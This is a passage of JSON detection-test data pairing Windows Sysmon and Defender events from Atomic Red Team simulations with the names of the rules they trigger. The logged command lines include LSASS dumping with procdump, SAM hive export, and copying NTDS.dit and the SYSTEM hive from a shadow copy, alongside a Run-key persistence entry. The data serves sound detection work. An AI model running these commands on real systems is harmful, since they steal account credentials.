14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 
15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. 
","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error 
Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 
1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine 
Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection 
User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection 
Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"},"EventID":1116,"EventRecordID":102,"Execution_attributes":{"ProcessID":6024,"ThreadID":6068},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows 
Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution_attributes":{"ProcessID":3368,"ThreadID":4748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious 